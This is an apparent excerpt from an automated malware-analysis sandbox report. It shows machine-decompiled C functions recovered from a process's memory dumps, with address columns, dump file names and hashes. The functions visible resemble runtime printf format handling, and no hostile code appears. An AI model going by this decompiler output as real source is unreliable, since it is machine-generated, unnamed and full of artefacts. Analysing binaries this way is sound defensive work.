							_t221 =  &(( *(_t405 + 0x1c))[4]);
							 *(_t405 + 0x10) =  &(_t333[4]);
							_t403 = _t403 - 1;
							 *(_t405 + 0x1c) = _t221;
							 *(_t405 + 0x50) = _t403;
						} while (_t403 != 0);
						_t339 =  *(_t405 + 0x24);
						goto L14;
					}
					return E00EC5355( *((intOrPtr*)(_t405 + 0x4c)), _t403,  *((intOrPtr*)(_t405 + 0x4c)));
				}
				return _t213;
			}






























                                                                                                                0x00ec4f0f
                                                                                                                0x00ec4f14
                                                                                                                0x00ec4f18
                                                                                                                0x00ec4f1e
                                                                                                                0x00ec4f24
                                                                                                                0x00ec4f28
                                                                                                                0x00ec4f3d
                                                                                                                0x00ec4f40
                                                                                                                0x00ec4f45
                                                                                                                0x00ec4f49
                                                                                                                0x00ec5336
                                                                                                                0x00ec5338
                                                                                                                0x00ec533d
                                                                                                                0x00ec5343
                                                                                                                0x00ec5346
                                                                                                                0x00ec5349
                                                                                                                0x00000000
                                                                                                                0x00ec534c
                                                                                                                0x00ec4f56
                                                                                                                0x00ec4f5e
                                                                                                                0x00ec4f61
                                                                                                                0x00ec4f66
                                                                                                                0x00ec4f6a
                                                                                                                0x00ec4f8d
                                                                                                                0x00ec4f90
                                                                                                                0x00ec4f93
                                                                                                                0x00ec4f95
                                                                                                                0x00ec4f98
                                                                                                                0x00ec4f9c
                                                                                                                0x00ec4fa0
                                                                                                                0x00ec4fa4
                                                                                                                0x00ec4f6c
                                                                                                                0x00ec4f76
                                                                                                                0x00ec4f7b
                                                                                                                0x00ec4f7f
                                                                                                                0x00ec4f83
                                                                                                                0x00ec4f87
                                                                                                                0x00ec4f87
                                                                                                                0x00ec4fab
                                                                                                                0x00ec4fb0
                                                                                                                0x00ec4fb4
                                                                                                                0x00ec4fb6
                                                                                                                0x00ec4fbd
                                                                                                                0x00ec4fc2
                                                                                                                0x00ec4fc6
                                                                                                                0x00ec4fc8
                                                                                                                0x00ec4fe4
                                                                                                                0x00ec4fe7
                                                                                                                0x00ec4ffc
                                                                                                                0x00ec5000
                                                                                                                0x00ec501e
                                                                                                                0x00ec5059
                                                                                                                0x00ec509a
                                                                                                                0x00ec50a8
                                                                                                                0x00ec50d8
                                                                                                                0x00ec50de
                                                                                                                0x00ec50e8
                                                                                                                0x00ec50ee
                                                                                                                0x00ec50f1
                                                                                                                0x00ec50f3
                                                                                                                0x00ec50f7
                                                                                                                0x00ec50fe
                                                                                                                0x00ec5107
                                                                                                                0x00ec5111
                                                                                                                0x00ec5140
                                                                                                                0x00ec5173
                                                                                                                0x00ec518c
                                                                                                                0x00ec51a8
                                                                                                                0x00ec51c2
                                                                                                                0x00ec51c5
                                                                                                                0x00ec51da
                                                                                                                0x00ec51e4
                                                                                                                0x00ec51e6
                                                                                                                0x00ec51ea
                                                                                                                0x00ec51f2
                                                                                                                0x00ec51f6
                                                                                                                0x00ec51f6
                                                                                                                0x00ec520c
                                                                                                                0x00ec5211
                                                                                                                0x00ec5215
                                                                                                                0x00ec5223
                                                                                                                0x00ec522f
                                                                                                                0x00ec523e
                                                                                                                0x00ec524d
                                                                                                                0x00ec5253
                                                                                                                0x00ec525e
                                                                                                                0x00ec526a
                                                                                                                0x00ec5279
                                                                                                                0x00ec5288
                                                                                                                0x00ec528e
                                                                                                                0x00ec5299
                                                                                                                0x00ec52a6
                                                                                                                0x00ec52b5
                                                                                                                0x00ec52c4
                                                                                                                0x00ec52d1
                                                                                                                0x00ec52de
                                                                                                                0x00ec52ed
                                                                                                                0x00ec52fc
                                                                                                                0x00ec530d
                                                                                                                0x00ec5319
                                                                                                                0x00ec531c
                                                                                                                0x00ec5320
                                                                                                                0x00ec5323
                                                                                                                0x00ec5327
                                                                                                                0x00ec5327
                                                                                                                0x00ec5331
                                                                                                                0x00000000
                                                                                                                0x00ec5335
                                                                                                                0x00000000
                                                                                                                0x00ec4f33
                                                                                                                0x00ec5352

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 32b4927a902a2e1edbcd7847f9e31c9f1e84bfb23021ff1b96a2731b96e77ad0
                                                                                                                • Instruction ID: 927e776bcae2357e8fef5ff736cc380a9779bfd20363ee3f553e89033c98e2b1
                                                                                                                • Opcode Fuzzy Hash: 32b4927a902a2e1edbcd7847f9e31c9f1e84bfb23021ff1b96a2731b96e77ad0
                                                                                                                • Instruction Fuzzy Hash: 5CD16C756183808FC704CF1AE9A093ABBF0FBDA340B48899EF5D597352C631E619DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED9951, Relevance: .2, Instructions: 237COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E00ED9951(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
				_t52 =  *0xef1558; // 0xf529bb33
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00EDA383(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E00ED3C6A(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E00ED8C18(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E00EDA69E(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E00ED8C18(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E00EDA580(_t135, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00ED8C18(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E00EDA11B(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00EDA2F8(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00ED9E81(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00EDA265(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00EDA2D9(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E00ED9CC4(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00EDA083(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}











































                                                                                                                0x00ed9951
                                                                                                                0x00ed9959
                                                                                                                0x00ed9960
                                                                                                                0x00ed9965
                                                                                                                0x00ed9967
                                                                                                                0x00ed996b
                                                                                                                0x00ed996e
                                                                                                                0x00ed9972
                                                                                                                0x00ed9973
                                                                                                                0x00ed9976
                                                                                                                0x00ed99e3
                                                                                                                0x00ed99e6
                                                                                                                0x00ed9a35
                                                                                                                0x00ed9a35
                                                                                                                0x00ed9a38
                                                                                                                0x00ed99a4
                                                                                                                0x00ed99a6
                                                                                                                0x00ed99ab
                                                                                                                0x00ed99ad
                                                                                                                0x00ed9a53
                                                                                                                0x00ed9a56
                                                                                                                0x00ed9b9c
                                                                                                                0x00ed9b9e
                                                                                                                0x00ed9bad
                                                                                                                0x00ed9bad
                                                                                                                0x00ed9a5c
                                                                                                                0x00ed9a61
                                                                                                                0x00ed9a64
                                                                                                                0x00ed9a67
                                                                                                                0x00ed9a6b
                                                                                                                0x00ed9a71
                                                                                                                0x00ed9a72
                                                                                                                0x00ed9a74
                                                                                                                0x00ed9a9e
                                                                                                                0x00ed9a9e
                                                                                                                0x00ed9aa2
                                                                                                                0x00ed9aa5
                                                                                                                0x00ed9aaf
                                                                                                                0x00ed9ab1
                                                                                                                0x00ed9ab4
                                                                                                                0x00ed9ab6
                                                                                                                0x00ed9abc
                                                                                                                0x00ed9abc
                                                                                                                0x00ed9abe
                                                                                                                0x00ed9abe
                                                                                                                0x00ed9ac1
                                                                                                                0x00ed9acf
                                                                                                                0x00ed9acf
                                                                                                                0x00ed9ad1
                                                                                                                0x00ed9ad3
                                                                                                                0x00ed9ad4
                                                                                                                0x00ed9ad6
                                                                                                                0x00ed9adc
                                                                                                                0x00ed9ade
                                                                                                                0x00ed9adf
                                                                                                                0x00ed9ae4
                                                                                                                0x00ed9ae7
                                                                                                                0x00ed9af5
                                                                                                                0x00ed9af5
                                                                                                                0x00ed9af7
                                                                                                                0x00ed9af7
                                                                                                                0x00ed9b02
                                                                                                                0x00ed9b04
                                                                                                                0x00ed9b09
                                                                                                                0x00ed9b09
                                                                                                                0x00ed9b0c
                                                                                                                0x00ed9b12
                                                                                                                0x00ed9b14
                                                                                                                0x00ed9b17
                                                                                                                0x00ed9b27
                                                                                                                0x00ed9b2c
                                                                                                                0x00ed9b2c
                                                                                                                0x00ed9b41
                                                                                                                0x00ed9b46
                                                                                                                0x00ed9b49
                                                                                                                0x00ed9b4e
                                                                                                                0x00ed9b51
                                                                                                                0x00ed9b53
                                                                                                                0x00ed9b55
                                                                                                                0x00ed9b58
                                                                                                                0x00ed9b5b
                                                                                                                0x00ed9b68
                                                                                                                0x00ed9b6d
                                                                                                                0x00ed9b6d
                                                                                                                0x00ed9b5b
                                                                                                                0x00ed9b74
                                                                                                                0x00ed9b79
                                                                                                                0x00ed9b7c
                                                                                                                0x00ed9b81
                                                                                                                0x00ed9b84
                                                                                                                0x00ed9b86
                                                                                                                0x00ed9b93
                                                                                                                0x00ed9b98
                                                                                                                0x00ed9b86
                                                                                                                0x00000000
                                                                                                                0x00ed9b9b
                                                                                                                0x00ed9aeb
                                                                                                                0x00ed9aec
                                                                                                                0x00ed9aef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9af1
                                                                                                                0x00000000
                                                                                                                0x00ed9af1
                                                                                                                0x00ed9ad8
                                                                                                                0x00ed9ada
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9ada
                                                                                                                0x00ed9ac5
                                                                                                                0x00ed9ac6
                                                                                                                0x00ed9ac9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9acb
                                                                                                                0x00000000
                                                                                                                0x00ed9acb
                                                                                                                0x00000000
                                                                                                                0x00ed9ab8
                                                                                                                0x00ed9aa9
                                                                                                                0x00ed9aaa
                                                                                                                0x00ed9aad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9aad
                                                                                                                0x00ed9a78
                                                                                                                0x00ed9a7b
                                                                                                                0x00ed9a7d
                                                                                                                0x00ed9a88
                                                                                                                0x00ed9a8a
                                                                                                                0x00ed9a92
                                                                                                                0x00ed9a94
                                                                                                                0x00ed9a96
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9a98
                                                                                                                0x00ed9a9c
                                                                                                                0x00ed9a9c
                                                                                                                0x00000000
                                                                                                                0x00ed9a9c
                                                                                                                0x00ed9a8c
                                                                                                                0x00ed9a81
                                                                                                                0x00ed9a81
                                                                                                                0x00ed9a82
                                                                                                                0x00000000
                                                                                                                0x00ed9a82
                                                                                                                0x00ed9a7f
                                                                                                                0x00000000
                                                                                                                0x00ed9a7f
                                                                                                                0x00ed99b3
                                                                                                                0x00000000
                                                                                                                0x00ed99b3
                                                                                                                0x00ed9a3f
                                                                                                                0x00ed9a3f
                                                                                                                0x00ed9a42
                                                                                                                0x00ed9a14
                                                                                                                0x00ed9a14
                                                                                                                0x00ed9a15
                                                                                                                0x00ed9a17
                                                                                                                0x00ed9a19
                                                                                                                0x00000000
                                                                                                                0x00ed9a19
                                                                                                                0x00ed9a44
                                                                                                                0x00ed9a47
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9a4d
                                                                                                                0x00ed99bc
                                                                                                                0x00ed99bc
                                                                                                                0x00000000
                                                                                                                0x00ed99bc
                                                                                                                0x00ed99e8
                                                                                                                0x00ed9a2b
                                                                                                                0x00000000
                                                                                                                0x00ed9a2b
                                                                                                                0x00ed99ea
                                                                                                                0x00ed99ed
                                                                                                                0x00ed9a20
                                                                                                                0x00ed9a22
                                                                                                                0x00000000
                                                                                                                0x00ed9a22
                                                                                                                0x00ed99ef
                                                                                                                0x00ed99f2
                                                                                                                0x00ed9a10
                                                                                                                0x00ed9a10
                                                                                                                0x00ed9a10
                                                                                                                0x00ed9a10
                                                                                                                0x00000000
                                                                                                                0x00ed9a10
                                                                                                                0x00ed99f4
                                                                                                                0x00ed99f7
                                                                                                                0x00ed9a09
                                                                                                                0x00000000
                                                                                                                0x00ed9a09
                                                                                                                0x00ed99f9
                                                                                                                0x00ed99fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9a00
                                                                                                                0x00000000
                                                                                                                0x00ed9a00
                                                                                                                0x00ed9978
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed997e
                                                                                                                0x00ed9980
                                                                                                                0x00ed99c0
                                                                                                                0x00ed99c0
                                                                                                                0x00ed99c3
                                                                                                                0x00ed99dc
                                                                                                                0x00000000
                                                                                                                0x00ed99dc
                                                                                                                0x00ed99c5
                                                                                                                0x00ed99c5
                                                                                                                0x00ed99c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed99cb
                                                                                                                0x00ed99ce
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed99d0
                                                                                                                0x00ed99d3
                                                                                                                0x00000000
                                                                                                                0x00ed99d3
                                                                                                                0x00ed9982
                                                                                                                0x00ed99ba
                                                                                                                0x00000000
                                                                                                                0x00ed99ba
                                                                                                                0x00ed9986
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed998f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9994
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed9999
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed99a2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 829edcd778019e4076ba9ad2d43d07ba38ee9e90a814802271e712e17a64fc60
                                                                                                                • Instruction ID: ca04c286009c9595e2e1ad44e7edb07530829f31535379d2de2e4d52085e2aaa
                                                                                                                • Opcode Fuzzy Hash: 829edcd778019e4076ba9ad2d43d07ba38ee9e90a814802271e712e17a64fc60
                                                                                                                • Instruction Fuzzy Hash: CF61397260070866DE389A288DA2BBE63D4DB81308F14391FE847FF3C3D6159E43C256
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED9722, Relevance: .2, Instructions: 214COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00ED9722(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00EDA310(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00ED8BEC(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00EDA60B(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00ED8BEC(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00EDA4D9(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00ED8BEC(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00EDA11B(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00EDA2F8(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00ED9D27(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00EDA265(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00EDA2D9(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00ED9C61(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00ED9FF3(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}






































                                                                                                                0x00ed9727
                                                                                                                0x00ed972a
                                                                                                                0x00ed972e
                                                                                                                0x00ed9731
                                                                                                                0x00ed9735
                                                                                                                0x00ed9738
                                                                                                                0x00ed97a6
                                                                                                                0x00ed97a9
                                                                                                                0x00ed97f8
                                                                                                                0x00ed97f8
                                                                                                                0x00ed97fb
                                                                                                                0x00ed9768
                                                                                                                0x00ed976a
                                                                                                                0x00ed976f
                                                                                                                0x00ed9771
                                                                                                                0x00ed9816
                                                                                                                0x00ed981a
                                                                                                                0x00ed9823
                                                                                                                0x00ed9828
                                                                                                                0x00ed9829
                                                                                                                0x00ed982d
                                                                                                                0x00ed982f
                                                                                                                0x00ed9834
                                                                                                                0x00ed9837
                                                                                                                0x00ed9839
                                                                                                                0x00ed9862
                                                                                                                0x00ed9862
                                                                                                                0x00ed9865
                                                                                                                0x00ed9868
                                                                                                                0x00ed986f
                                                                                                                0x00ed9871
                                                                                                                0x00ed9874
                                                                                                                0x00ed9876
                                                                                                                0x00ed987a
                                                                                                                0x00ed987a
                                                                                                                0x00ed987d
                                                                                                                0x00ed9888
                                                                                                                0x00ed9888
                                                                                                                0x00ed988a
                                                                                                                0x00ed988a
                                                                                                                0x00ed988c
                                                                                                                0x00ed9892
                                                                                                                0x00ed9892
                                                                                                                0x00ed9897
                                                                                                                0x00ed989a
                                                                                                                0x00ed98a5
                                                                                                                0x00ed98a5
                                                                                                                0x00ed98a7
                                                                                                                0x00ed98a7
                                                                                                                0x00ed98b2
                                                                                                                0x00ed98b6
                                                                                                                0x00ed98b6
                                                                                                                0x00ed98b9
                                                                                                                0x00ed98bf
                                                                                                                0x00ed98c1
                                                                                                                0x00ed98c4
                                                                                                                0x00ed98d4
                                                                                                                0x00ed98d9
                                                                                                                0x00ed98d9
